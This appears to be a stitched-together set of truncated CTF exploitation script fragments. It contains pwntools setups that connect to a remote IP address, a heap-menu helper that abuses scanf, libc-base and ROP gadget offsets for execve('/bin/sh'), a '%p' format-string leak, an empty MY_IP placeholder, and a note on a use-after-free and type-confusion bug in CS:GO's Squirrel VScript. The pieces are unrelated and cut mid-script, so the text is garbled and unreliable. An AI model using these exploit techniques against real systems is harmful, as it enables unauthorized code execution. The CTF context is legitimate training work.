Discord flag.
Brute-force the flag byte by byte and apply the encrypt function to verify each candidate.
from pwn import *

# Target settings for this local exploit script.
context.update(arch='amd64', os='linux')

# Local target process; the libc referenced is the author's system libc, so any
# offsets derived from it only match that exact build.
r = process('./minho')
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
| def new(size, data, abuse_scanf=0): | |
| r.sendlineafter(b'> ', b'1') | |
| r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode()) |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdarg.h> | |
| #include <string.h> | |
| #include <fcntl.h> | |
| #include <unistd.h> | |
| #include <sys/mman.h> | |
| #define INFO "[*] " |
#!/usr/bin/env python3
import struct
import sys

# argv[1] is a leaked libc address in hex; the constant is the offset of the
# leaked symbol inside this particular libc build (which symbol is not visible
# here -- TODO confirm), so the result is the libc base only for that build.
leaked_addr = int(sys.argv[1], 16)
libc = leaked_addr - 0x270b3

# Build-specific offsets used by the rest of the script (presumably
# libc-relative; verify against the exact libc the target runs).
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
#!/usr/bin/env python3
from pwn import *

context.clear(endian='little', arch='amd64', os='linux')

# Remote target, host and port as given in the writeup.
r = remote('125.235.240.166', 33333)

# 1st boss: the first stage's input is the bare format specifier '%p'.
r.sendline(b'%p')
#!/usr/bin/env python3
from pwn import *

context.clear(endian='little', arch='amd64', os='linux')

# Challenge-provided libc; symbol offsets resolved from it only match this
# exact build.
libc = ELF('./libc-2.31.so')

# Left empty in the published script -- presumably blanked by the author for
# publication; TODO confirm what the rest of the script expects here.
MY_IP = b''

# Remote target, host and port as given in the writeup.
r = remote('125.235.240.166', 20120)
This challenge involves an old version of CS:GO VScript, which is vulnerable to a use-after-free (UAF) bug and a type-confusion bug.
The sort function of a Squirrel array is array_sort in sqbaselib.cpp, which calls _qsort:
// v: VM, o: array object, func: compare func
#!/usr/bin/env python3
from pwn import *

# Same effect as assigning context.os / context.arch / context.terminal
# one attribute at a time.
context.update(
    os='linux',
    arch='amd64',
    terminal=['tmux', 'new-window'],
)

# Challenge-provided libc build.
l = ELF('./libc-2.31.so')
#!/usr/bin/env python3
from pwn import *

# Same effect as assigning context.os / context.arch / context.terminal
# one attribute at a time.
context.update(
    os='linux',
    arch='amd64',
    terminal=['tmux', 'sp', '-v', '-p', '90'],
)

# Target binary plus the author's system libc 2.31; offsets taken from this
# libc only apply to that exact build.
b = ELF('./secret_keeper')
l = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
#!/usr/bin/env python3
from pwn import *

# Same effect as assigning context.os and context.arch separately.
context.update(os='linux', arch='amd64')

# Target binary and the libc shipped with the challenge.
b = ELF('./sandboxd')
l = ELF('./libc-2.31.so')

# Terminal used for debugger splits; set after the ELFs load, as in the
# original ordering.
context.terminal = ['tmux', 'sp', '-h', '-p', '80']